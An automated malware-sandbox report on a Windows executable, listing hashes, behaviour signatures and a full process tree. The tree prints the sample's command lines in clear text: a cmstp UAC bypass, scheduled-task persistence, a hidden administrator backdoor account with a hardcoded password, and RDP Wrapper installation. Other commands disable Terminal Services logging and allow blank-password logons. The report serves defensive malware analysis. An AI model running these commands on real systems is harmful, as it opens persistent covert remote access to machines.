Analysis
-
max time kernel
120s -
max time network
128s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
13-02-2022 11:12
Static task
static1
Behavioral task
behavioral1
Sample
b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
Resource
win10v2004-en-20220112
General
-
Target
b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
-
Size
424KB
-
MD5
afeac971ffe5bab0bf3da53291b523fe
-
SHA1
f1686e5d05dfb82662cea2907b2e9685d6641755
-
SHA256
b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2
-
SHA512
a065544135927cd13c547faf19e0135e7ad3f84b503f99ae4f82628643aadca6eabfa3ab7025bbc9f1efce854b6114db71d63cac8ff20b789d3385f238d1cd04
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
j4dsucc1.exepid process 968 j4dsucc1.exe -
Modifies Windows Firewall 1 TTPs
-
Possible privilege escalation attempt 6 IoCs
Processes:
icacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exepid process 1768 icacls.exe 1632 takeown.exe 1060 icacls.exe 648 icacls.exe 1592 takeown.exe 1604 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Allows Network login with blank passwords 1 TTPs 1 IoCs
Allows local user accounts with blank passwords to access device from the network.
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0" reg.exe -
Modifies file permissions 1 TTPs 6 IoCs
Processes:
takeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exepid process 1632 takeown.exe 1060 icacls.exe 648 icacls.exe 1592 takeown.exe 1604 icacls.exe 1768 icacls.exe -
Drops file in Program Files directory 2 IoCs
Processes:
j4dsucc1.exedescription ioc process File opened for modification C:\Program Files\Common Files\Services\rdpwrap.ini j4dsucc1.exe File opened for modification C:\Program Files\Common Files\Services\rdpwrap.dll j4dsucc1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1104 taskkill.exe -
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
j4dsucc1.exepid process 968 j4dsucc1.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exepid process 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exetaskkill.exedescription pid process Token: SeDebugPrivilege 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe Token: SeDebugPrivilege 1104 taskkill.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exej4dsucc1.exepid process 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe 968 j4dsucc1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.execmd.exej4dsucc1.execmd.execmd.execmd.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1688 wrote to memory of 820 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe cmstp.exe PID 1688 wrote to memory of 820 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe cmstp.exe PID 1688 wrote to memory of 820 1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe cmstp.exe PID 684 wrote to memory of 968 684 cmd.exe j4dsucc1.exe PID 684 wrote to memory of 968 684 cmd.exe j4dsucc1.exe PID 684 wrote to memory of 968 684 cmd.exe j4dsucc1.exe PID 684 wrote to memory of 968 684 cmd.exe j4dsucc1.exe PID 968 wrote to memory of 652 968 j4dsucc1.exe cmd.exe PID 968 wrote to memory of 652 968 j4dsucc1.exe cmd.exe PID 968 wrote to memory of 652 968 j4dsucc1.exe cmd.exe PID 968 wrote to memory of 652 968 j4dsucc1.exe cmd.exe PID 968 wrote to memory of 1832 968 j4dsucc1.exe cmd.exe PID 968 wrote to memory of 1832 968 j4dsucc1.exe cmd.exe PID 968 wrote to memory of 1832 968 j4dsucc1.exe cmd.exe PID 968 wrote to memory of 1832 968 j4dsucc1.exe cmd.exe PID 968 wrote to memory of 1444 968 j4dsucc1.exe net.exe PID 968 wrote to memory of 1444 968 j4dsucc1.exe net.exe PID 968 wrote to memory of 1444 968 j4dsucc1.exe net.exe PID 968 wrote to memory of 1444 968 j4dsucc1.exe net.exe PID 968 wrote to memory of 1704 968 j4dsucc1.exe net.exe PID 968 wrote to memory of 1704 968 j4dsucc1.exe net.exe PID 968 wrote to memory of 1704 968 j4dsucc1.exe net.exe PID 968 wrote to memory of 1704 968 j4dsucc1.exe net.exe PID 968 wrote to memory of 852 968 j4dsucc1.exe cmd.exe PID 968 wrote to memory of 852 968 j4dsucc1.exe cmd.exe PID 968 wrote to memory of 852 968 j4dsucc1.exe cmd.exe PID 968 wrote to memory of 852 968 j4dsucc1.exe cmd.exe PID 1832 wrote to memory of 1768 1832 cmd.exe schtasks.exe PID 1832 wrote to memory of 1768 1832 cmd.exe schtasks.exe PID 1832 wrote to memory of 1768 1832 cmd.exe schtasks.exe PID 1832 wrote to memory of 1768 1832 cmd.exe schtasks.exe PID 852 wrote to memory of 584 852 cmd.exe choice.exe PID 852 wrote to memory of 584 852 cmd.exe choice.exe PID 852 wrote to memory of 584 852 cmd.exe choice.exe PID 852 wrote to memory of 584 852 cmd.exe choice.exe PID 968 wrote to memory of 2028 968 j4dsucc1.exe cmd.exe PID 968 wrote to memory of 2028 968 j4dsucc1.exe cmd.exe PID 968 wrote to memory of 2028 968 j4dsucc1.exe cmd.exe PID 968 wrote to memory of 2028 968 j4dsucc1.exe cmd.exe PID 2028 wrote to memory of 916 2028 cmd.exe choice.exe PID 2028 wrote to memory of 916 2028 cmd.exe choice.exe PID 2028 wrote to memory of 916 2028 cmd.exe choice.exe PID 2028 wrote to memory of 916 2028 cmd.exe choice.exe PID 1704 wrote to memory of 1532 1704 net.exe net1.exe PID 1704 wrote to memory of 1532 1704 net.exe net1.exe PID 1704 wrote to memory of 1532 1704 net.exe net1.exe PID 1704 wrote to memory of 1532 1704 net.exe net1.exe PID 1444 wrote to memory of 1632 1444 net.exe net1.exe PID 1444 wrote to memory of 1632 1444 net.exe net1.exe PID 1444 wrote to memory of 1632 1444 net.exe net1.exe PID 1444 wrote to memory of 1632 1444 net.exe net1.exe PID 2028 wrote to memory of 1064 2028 cmd.exe net.exe PID 2028 wrote to memory of 1064 2028 cmd.exe net.exe PID 2028 wrote to memory of 1064 2028 cmd.exe net.exe PID 2028 wrote to memory of 1064 2028 cmd.exe net.exe PID 1064 wrote to memory of 1720 1064 net.exe net1.exe PID 1064 wrote to memory of 1720 1064 net.exe net1.exe PID 1064 wrote to memory of 1720 1064 net.exe net1.exe PID 1064 wrote to memory of 1720 1064 net.exe net1.exe PID 2028 wrote to memory of 1604 2028 cmd.exe net.exe PID 2028 wrote to memory of 1604 2028 cmd.exe net.exe PID 2028 wrote to memory of 1604 2028 cmd.exe net.exe PID 2028 wrote to memory of 1604 2028 cmd.exe net.exe PID 1604 wrote to memory of 1616 1604 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe"C:\Users\Admin\AppData\Local\Temp\b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\cmstp.exe"c:\windows\system32\cmstp.exe" /au c:\Users\Public\\552pku1a.inf2⤵
-
C:\Windows\system32\cmd.execmd /c start c:\Users\Public\j4dsucc1.exe1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\Users\Public\j4dsucc1.exec:\Users\Public\j4dsucc1.exe2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c mkdir "C:\Program Files\Common Files\Services" & exit3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks /create /tn "lst64" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs" /sc onlogon /rl highest /f & choice /n /c y /d y /t 3 > nul & schtasks /Run /tn "lst64" & choice /n /c y /d y /t 3 > nul & schtasks /Delete /tn "lst64" /f & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "lst64" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs" /sc onlogon /rl highest /f4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn "lst64"4⤵
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /tn "lst64" /f4⤵
-
C:\Windows\SysWOW64\net.exenet user "Admin" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "Admin" "4⤵
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c choice /n /c y /d y /t 30 > nul & reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowFullControl /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fLogonDisabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowFullControl /t REG_DWORD /d 1 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v LoggingEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v AllowDomainPINLogon /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v BlockDomainPicturePassword /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v CleanupProfiles /t REG_DWORD /d 99999 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v EnableFIDODeviceLogon /t REG_DWORD /d 0 /f & net start "TermService" & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 304⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowFullControl /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fLogonDisabled /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowFullControl /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v LoggingEnabled /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v AllowDomainPINLogon /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v BlockDomainPicturePassword /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v CleanupProfiles /t REG_DWORD /d 99999 /f4⤵
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v EnableFIDODeviceLogon /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\net.exenet start "TermService"4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start "TermService"5⤵
-
C:\Windows\SysWOW64\cmd.execmd /c choice /n /c y /d y /t 3 > nul & del /f /q "c:\Users\Public\j4dsucc1.exe" & net stop "TermService" /y & net user SysWOW64 t0or9368 /add & choice /n /c y /d y /t 3 > nul & net user SysWOW64 /active:yes & net user SysWOW64 /expires:never & choice /n /c y /d y /t 3 > nul & net user SysWOW64 /passwordchg:no & net user SysWOW64 /logonpasswordchg:no & net localgroup Administradores SysWOW64 /add & TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.ini" & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant SysWOW64:F & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant Administradores:F & TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.dll" & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant SysWOW64:F & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant Administradores:F & reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\Common Files\Services\rdpwrap.dll" /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f & netsh advfirewall firewall set rule group="Escritorio remoto" new enable=Yes & choice /n /c y /d y /t 3 > nul & net localgroup "Usuarios de escritorio remoto" SysWOW64 /add & net localgroup "Usuarios de escritorio remoto" "Admin" /add & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\net.exenet stop "TermService" /y4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TermService" /y5⤵
-
C:\Windows\SysWOW64\net.exenet user SysWOW64 t0or9368 /add4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user SysWOW64 t0or9368 /add5⤵
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\net.exenet user SysWOW64 /active:yes4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user SysWOW64 /active:yes5⤵
-
C:\Windows\SysWOW64\net.exenet user SysWOW64 /expires:never4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user SysWOW64 /expires:never5⤵
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\net.exenet user SysWOW64 /passwordchg:no4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user SysWOW64 /passwordchg:no5⤵
-
C:\Windows\SysWOW64\net.exenet user SysWOW64 /logonpasswordchg:no4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user SysWOW64 /logonpasswordchg:no5⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administradores SysWOW64 /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administradores SysWOW64 /add5⤵
-
C:\Windows\SysWOW64\takeown.exeTAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.ini"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant SysWOW64:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant Administradores:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\takeown.exeTAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.dll"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant SysWOW64:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant Administradores:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\Common Files\Services\rdpwrap.dll" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f4⤵
- Allows Network login with blank passwords
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Escritorio remoto" new enable=Yes4⤵
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" SysWOW64 /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" SysWOW64 /add5⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" "Admin" /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" "Admin" /add5⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM cmstp.exe /F1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {0A7BB5C7-B288-40DD-830F-55443A25FF75} S-1-5-21-3846991908-3261386348-1409841751-1000:VQVVOAJK\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs"2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.bat3⤵
-
C:\Windows\system32\reg.exereg add "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v SysWOW64 /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts" /v SysWOW64 /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SysWOW64 /t REG_DWORD /d 0 /f4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Common Files\Services\rdpwrap.dllMD5
461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
C:\Program Files\Common Files\Services\rdpwrap.iniMD5
214a63289660657dcd4824e206934256
